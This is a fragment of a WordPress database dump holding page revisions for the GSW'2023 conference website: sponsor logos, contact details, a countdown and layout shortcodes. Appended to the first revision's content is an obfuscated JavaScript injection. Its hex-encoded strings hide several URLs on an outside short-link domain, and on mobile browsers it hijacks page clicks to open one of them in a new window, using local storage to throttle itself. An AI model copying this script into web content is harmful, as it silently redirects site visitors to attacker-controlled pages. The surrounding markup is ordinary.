link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-19 21:52:15','2023-08-19 21:52:15','',3066,'https://gsw2023.com/?p=5343',0,'revision','',0),
(5344,1,'2023-08-19 21:54:52','2023-08-19 21:54:52','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]\r\n<h3 style=\"text-align: center;\"></h3>\r\n&nbsp;\r\n\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" />\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner]</p>\r\n<p style=\"text-align: center;\">[vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 